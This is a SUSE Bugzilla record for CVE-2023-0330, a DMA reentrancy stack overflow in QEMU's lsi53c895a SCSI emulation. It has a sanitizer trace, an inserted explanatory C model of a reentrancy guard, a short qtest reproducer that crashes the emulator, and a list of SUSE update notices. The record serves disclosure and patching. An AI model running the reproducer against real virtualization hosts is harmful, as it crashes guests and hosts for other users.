Bugzilla – Bug 1207205
VUL-0: CVE-2023-0330: kvm,qemu: lsi53c895a: DMA reentrancy issue leads to stack overflow
Last modified: 2024-04-23 12:30:13 UTC
rh#2160151

A vulnerability in the lsi53c895a device which affects the latest version of qemu. The carefully designed PoC can repeatedly trigger DMA writes but does not limit the addresses written to the DMA, resulting in reentrancy issues and eventually overflow. It is worth noting that the DMA operation is the pci_dma_write() in lsi_mem_write(), so the issue cannot be solved by modifying the 'attrs' flag.

The following log can reveal it:

==3850539==ERROR: AddressSanitizer: stack-overflow on address 0x7ffeb10d5e58 (pc 0x55cd154d0f16 bp 0x7ffeb10d6690 sp 0x7ffeb10d5e60 T0)
    #0 0x55cd154d0f16 in __asan_memcpy llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
    #1 0x55cd15b25676 in sparse_mem_read qemu/hw/mem/sparse-mem.c:50:9
    #2 0x55cd16c973cd in memory_region_read_accessor qemu/softmmu/memory.c:440:11
    #3 0x55cd16c6e9fa in access_with_adjusted_size qemu/softmmu/memory.c:554:18
    #4 0x55cd16c6cf11 in memory_region_dispatch_read1 qemu/softmmu/memory.c
    #5 0x55cd16c6cf11 in memory_region_dispatch_read qemu/softmmu/memory.c:1457:9
    #6 0x55cd16cb9270 in flatview_read_continue qemu/softmmu/physmem.c:2892:23
    #7 0x55cd16cba14f in flatview_read qemu/softmmu/physmem.c:2934:12
    #8 0x55cd16cb9ee3 in address_space_read_full qemu/softmmu/physmem.c:2947:18
    #9 0x55cd15ed44c5 in dma_memory_rw_relaxed qemu/include/sysemu/dma.h:87:12
    #10 0x55cd15ed44c5 in dma_memory_rw qemu/include/sysemu/dma.h:130:12
    #11 0x55cd15ed44c5 in pci_dma_rw qemu/include/hw/pci/pci.h:850:12
    #12 0x55cd15ed44c5 in pci_dma_read qemu/include/hw/pci/pci.h:869:12
    #13 0x55cd15ed44c5 in read_dword qemu/hw/scsi/lsi53c895a.c:472:5
    #14 0x55cd15ed44c5 in lsi_execute_script qemu/hw/scsi/lsi53c895a.c:1154:12
    #15 0x55cd15eed0e5 in lsi_command_complete qemu/hw/scsi/lsi53c895a.c:810:5
    #16 0x55cd15e3d5c1 in scsi_req_complete qemu/hw/scsi/scsi-bus.c:1518:5
    #17 0x55cd15e41f9c in scsi_unit_attention qemu/hw/scsi/scsi-bus.c:422:5
    #18 0x55cd15e33c59 in scsi_req_enqueue qemu/hw/scsi/scsi-bus.c:890:10
    #19 0x55cd15ed869c in lsi_do_command qemu/hw/scsi/lsi53c895a.c:869:9
    #20 0x55cd15ed869c in lsi_execute_script qemu/hw/scsi/lsi53c895a.c:1261:13
    #21 0x55cd15ece001 in lsi_reg_writeb qemu/hw/scsi/lsi53c895a.c
    #22 0x55cd16c6ef86 in memory_region_write_accessor qemu/softmmu/memory.c:492:5
    #23 0x55cd16c6e9fa in access_with_adjusted_size qemu/softmmu/memory.c:554:18
    #24 0x55cd16c6e2fa in memory_region_dispatch_write qemu/softmmu/memory.c
    #25 0x55cd16cc274c in flatview_write_continue qemu/softmmu/physmem.c:2825:23
    #26 0x55cd16cba662 in flatview_write qemu/softmmu/physmem.c:2867:12
    #27 0x55cd16cba3f3 in address_space_write qemu/softmmu/physmem.c:2963:18
    #28 0x55cd15ed4d5c in lsi_memcpy qemu/hw/scsi/lsi53c895a.c:1104:9
    #29 0x55cd15ed4d5c in lsi_execute_script qemu/hw/scsi/lsi53c895a.c:1563:13
    #30 0x55cd15ece001 in lsi_reg_writeb qemu/hw/scsi/lsi53c895a.c

References:
https://bugzilla.redhat.com/show_bug.cgi?id=2160151
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-0330
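The report above describes the mechanism from the defender's side: a device-initiated DMA write whose target address lands inside the device's own MMIO window is routed back into the device's register handler, which starts script execution again, and the nesting repeats until the stack is exhausted. The following is an added example, not code from this bug, from QEMU's lsi53c895a emulation, or from its upstream fix: a toy C model of that dispatch path with a depth-limited reentrancy guard in the MMIO handler, which is the general pattern for closing this class of bug. The register layout (REG_RUN), the two-word script format, the RAM and BAR addresses and the MAX_DEPTH limit are all constructed for the model.

```c
/* Toy model of DMA reentrancy in an emulated PCI device and of the guard
 * that blocks it. Added example: this is NOT QEMU's lsi53c895a code or its
 * fix; register layout, script format, addresses and MAX_DEPTH are assumed. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RAM_SIZE   0x4000u       /* guest RAM modelled as a flat buffer (constructed) */
#define MMIO_BASE  0xff000000u   /* where the device's BAR is mapped (constructed) */
#define MMIO_SIZE  0x1000u
#define REG_RUN    0x2fu         /* assumed: writing V here sets DSP to V and runs */
#define MAX_DEPTH  1             /* assumed guard limit: handler must not re-enter */

typedef struct {
    uint8_t  ram[RAM_SIZE];
    uint32_t dsp;            /* script pointer, an offset into ram */
    int      depth;          /* how many mmio_write frames are on the stack */
    int      max_depth_seen;
    int      rejected;       /* re-entrant MMIO writes the guard refused */
} Device;

static void mmio_write(Device *d, uint32_t off, uint32_t val);

/* Device-initiated DMA: a write to a guest-physical address. If the address
 * falls inside the device's own MMIO window it is dispatched back into the
 * device's register handler. That is the re-entrant path; the guard in
 * mmio_write is what keeps it from recursing without bound. */
static void dma_write(Device *d, uint32_t addr, uint32_t val)
{
    if (addr >= MMIO_BASE && addr - MMIO_BASE < MMIO_SIZE) {
        mmio_write(d, addr - MMIO_BASE, val);
    } else if (addr < RAM_SIZE && RAM_SIZE - addr >= sizeof val) {
        memcpy(d->ram + addr, &val, sizeof val);
    }
    /* writes outside RAM and MMIO are dropped in this model */
}

/* Script format (constructed): pairs of words [target][value] read from RAM;
 * a target of 0 ends the script. Each pair becomes one DMA write. */
static void execute_script(Device *d)
{
    for (;;) {
        uint32_t target, val;
        if (d->dsp > RAM_SIZE - 8) return;   /* script ran off the end of RAM */
        memcpy(&target, d->ram + d->dsp, 4);
        memcpy(&val, d->ram + d->dsp + 4, 4);
        d->dsp += 8;
        if (target == 0) return;
        dma_write(d, target, val);
    }
}

static void mmio_write(Device *d, uint32_t off, uint32_t val)
{
    /* Reentrancy guard: refuse to run the handler while it is already active. */
    if (d->depth >= MAX_DEPTH) {
        d->rejected++;
        return;
    }
    d->depth++;
    if (d->depth > d->max_depth_seen) d->max_depth_seen = d->depth;
    if (off == REG_RUN) {
        d->dsp = val;
        execute_script(d);
    }
    d->depth--;
}

/* Write one [target][value] instruction at a RAM offset. */
static void put_insn(Device *d, uint32_t off, uint32_t target, uint32_t val)
{
    memcpy(d->ram + off, &target, 4);
    memcpy(d->ram + off + 4, &val, 4);
}

/* A script whose only instruction DMA-writes to the device's own REG_RUN,
 * pointing back at the script itself. Without the guard this recurses until
 * the stack overflows; with it, the nested write is refused once and the
 * outer handler unwinds cleanly. Returns the number of refused re-entries,
 * or -1 if the handler nesting did not unwind to zero. */
static int demo_self_targeting_script(void)
{
    Device d = {0};
    put_insn(&d, 0x100, MMIO_BASE + REG_RUN, 0x100);
    put_insn(&d, 0x108, 0, 0);
    mmio_write(&d, REG_RUN, 0x100);   /* the guest's initial register write */
    return d.depth == 0 ? d.rejected : -1;
}

/* Control: a script that only DMA-writes to RAM must be unaffected by the
 * guard. Returns the word it wrote, or 0 if the guard interfered. */
static uint32_t demo_benign_script(void)
{
    Device d = {0};
    uint32_t out;
    put_insn(&d, 0x100, 0x2000, 0xdeadbeefu);
    put_insn(&d, 0x108, 0, 0);
    mmio_write(&d, REG_RUN, 0x100);
    memcpy(&out, d.ram + 0x2000, 4);
    return (d.rejected == 0 && d.depth == 0) ? out : 0;
}

int main(void)
{
    printf("self-targeting script: %d re-entrant write(s) refused\n",
           demo_self_targeting_script());
    printf("benign script wrote 0x%08x to RAM\n", demo_benign_script());
    return 0;
}
```

The guard sits at the point where the handler is re-entered, not at the guest's direct MMIO access: as the report notes, the write that closes the loop is issued by the device itself through pci_dma_write(), so attributes attached to the guest's own access never see it. Keeping the benign RAM-only script working is the property any real fix has to preserve alongside blocking the self-targeting one.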
Upstream commit:
https://lists.nongnu.org/archive/html/qemu-devel/2023-01/msg03411.html

Reproducer:

cat << EOF | ./x86_64-softmmu/qemu-system-x86_64 -machine accel=qtest \
  -m 512M -machine q35 -nodefaults -device lsi53c810 -device scsi-cd,drive=null0 \
  -display none -blockdev driver=null-co,node-name=null0 -qtest stdio
outl 0xcf8 0x80000804 /* PCI Command Register */
outl 0xcfc 0x7 /* Enable accesses */
outl 0xcf8 0x80000814 /* Memory Bar 1 */
outl 0xcfc 0xff100000 /* Set MMIO Address*/
outl 0xcf8 0x80000818 /* Memory Bar 2 */
outl 0xcfc 0xff000000 /* Set RAM Address*/
writel 0xff000000 0xc0000024
writel 0xff000114 0x00000080
writel 0xff00012c 0xff000000
writel 0xff000004 0xff000114
writel 0xff000008 0xff100014
writel 0xff10002f 0x000000ff
EOF
(In reply to Alexander Bergmann from comment #1)
> Upstream commit:
> https://lists.nongnu.org/archive/html/qemu-devel/2023-01/msg03411.html

I don't think this has been committed yet. Let's monitor when/if it will...
Ok, it looks like this may have been committed, becoming: b987718bbb1d0eabf95499b976212dd5f0120d75
SUSE-SU-2023:3015-1: An update that solves three vulnerabilities can now be installed.

Category: security (important)
Bug References: 1198037, 1207205, 1212968
CVE References: CVE-2021-4207, CVE-2023-0330, CVE-2023-2861
Sources used:
SUSE Linux Enterprise High Performance Computing 12 SP5 (src): qemu-3.1.1.1-69.1
SUSE Linux Enterprise Server 12 SP5 (src): qemu-3.1.1.1-69.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src): qemu-3.1.1.1-69.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:3082-1: An update that solves four vulnerabilities and has two fixes can now be installed.

Category: security (important)
Bug References: 1179993, 1181740, 1207205, 1212968, 1213001, 1213414
CVE References: CVE-2023-0330, CVE-2023-2861, CVE-2023-3255, CVE-2023-3301
Sources used:
Server Applications Module 15-SP5 (src): qemu-7.1.0-150500.49.6.1
openSUSE Leap 15.5 (src): qemu-linux-user-7.1.0-150500.49.6.1, qemu-7.1.0-150500.49.6.1
Basesystem Module 15-SP5 (src): qemu-7.1.0-150500.49.6.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
This is an autogenerated message for OBS integration: This bug (1207205) was mentioned in https://build.opensuse.org/request/show/1103082 Factory / qemu
SUSE-SU-2023:3444-1: An update that solves six vulnerabilities can now be installed.

Category: security (important)
Bug References: 1188609, 1190011, 1207205, 1212850, 1213414, 1213925
CVE References: CVE-2021-3638, CVE-2021-3750, CVE-2023-0330, CVE-2023-3180, CVE-2023-3301, CVE-2023-3354
Sources used:
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP3 (src): qemu-5.2.0-150300.127.3
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src): qemu-5.2.0-150300.127.3
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src): qemu-5.2.0-150300.127.3
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src): qemu-5.2.0-150300.127.3
SUSE Manager Proxy 4.2 (src): qemu-5.2.0-150300.127.3
SUSE Manager Retail Branch Server 4.2 (src): qemu-5.2.0-150300.127.3
SUSE Manager Server 4.2 (src): qemu-5.2.0-150300.127.3
SUSE Enterprise Storage 7.1 (src): qemu-5.2.0-150300.127.3
SUSE Linux Enterprise Micro 5.1 (src): qemu-5.2.0-150300.127.3
SUSE Linux Enterprise Micro 5.2 (src): qemu-5.2.0-150300.127.3
SUSE Linux Enterprise Micro for Rancher 5.2 (src): qemu-5.2.0-150300.127.3

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
This is an autogenerated message for OBS integration: This bug (1207205) was mentioned in https://build.opensuse.org/request/show/1110620 Factory / qemu
SUSE-SU-2023:3721-1: An update that solves 10 vulnerabilities and has one security fix can now be installed.

Category: security (important)
Bug References: 1172382, 1188609, 1190011, 1193880, 1197653, 1198712, 1207205, 1212850, 1212968, 1213925, 1215311
CVE References: CVE-2020-13754, CVE-2021-3638, CVE-2021-3750, CVE-2021-3929, CVE-2022-1050, CVE-2022-26354, CVE-2023-0330, CVE-2023-2861, CVE-2023-3180, CVE-2023-3354
Sources used:
openSUSE Leap 15.4 (src): qemu-4.2.1-150200.79.1
SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2 (src): qemu-4.2.1-150200.79.1
SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2 (src): qemu-4.2.1-150200.79.1
SUSE Linux Enterprise Server for SAP Applications 15 SP2 (src): qemu-4.2.1-150200.79.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:3800-1: An update that solves nine vulnerabilities and has one security fix can now be installed.

Category: security (important)
Bug References: 1172382, 1190011, 1193880, 1197653, 1198712, 1207205, 1212850, 1212968, 1213925, 1215311
CVE References: CVE-2019-13754, CVE-2021-3750, CVE-2021-3929, CVE-2022-1050, CVE-2022-26354, CVE-2023-0330, CVE-2023-2861, CVE-2023-3180, CVE-2023-3354
Sources used:
SUSE CaaS Platform 4.0 (src): qemu-3.1.1.1-150100.80.51.5
SUSE Linux Enterprise High Performance Computing 15 SP1 LTSS 15-SP1 (src): qemu-3.1.1.1-150100.80.51.5
SUSE Linux Enterprise Server 15 SP1 LTSS 15-SP1 (src): qemu-3.1.1.1-150100.80.51.5
SUSE Linux Enterprise Server for SAP Applications 15 SP1 (src): qemu-3.1.1.1-150100.80.51.5

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:4056-1: An update that solves five vulnerabilities and has four security fixes can now be installed.

Category: security (important)
Bug References: 1179993, 1181740, 1188609, 1190011, 1207205, 1212850, 1213663, 1213925, 1215311
CVE References: CVE-2021-3638, CVE-2021-3750, CVE-2023-0330, CVE-2023-3180, CVE-2023-3354
Sources used:
openSUSE Leap 15.4 (src): qemu-linux-user-6.2.0-150400.37.23.1, qemu-6.2.0-150400.37.23.1
SUSE Linux Enterprise Micro for Rancher 5.3 (src): qemu-6.2.0-150400.37.23.1
SUSE Linux Enterprise Micro 5.3 (src): qemu-6.2.0-150400.37.23.1
SUSE Linux Enterprise Micro for Rancher 5.4 (src): qemu-6.2.0-150400.37.23.1
SUSE Linux Enterprise Micro 5.4 (src): qemu-6.2.0-150400.37.23.1
Basesystem Module 15-SP4 (src): qemu-6.2.0-150400.37.23.1
Server Applications Module 15-SP4 (src): qemu-6.2.0-150400.37.23.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2023:3082-2: An update that solves four vulnerabilities and has two security fixes can now be installed.

Category: security (important)
Bug References: 1179993, 1181740, 1207205, 1212968, 1213001, 1213414
CVE References: CVE-2023-0330, CVE-2023-2861, CVE-2023-3255, CVE-2023-3301
Sources used:
SUSE Linux Enterprise Micro 5.5 (src): qemu-7.1.0-150500.49.6.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2024:1395-1: An update that solves five vulnerabilities can now be installed.

Category: security (important)
Bug References: 1190011, 1198038, 1207205, 1212850, 1213925
CVE References: CVE-2021-3750, CVE-2022-0216, CVE-2023-0330, CVE-2023-3180, CVE-2023-3354
Maintenance Incident: [SUSE:Maintenance:33441](https://smelt.suse.de/incident/33441/)
Sources used:
SUSE Linux Enterprise High Performance Computing 12 SP5 (src): qemu-3.1.1.1-72.1
SUSE Linux Enterprise Server 12 SP5 (src): qemu-3.1.1.1-72.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src): qemu-3.1.1.1-72.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.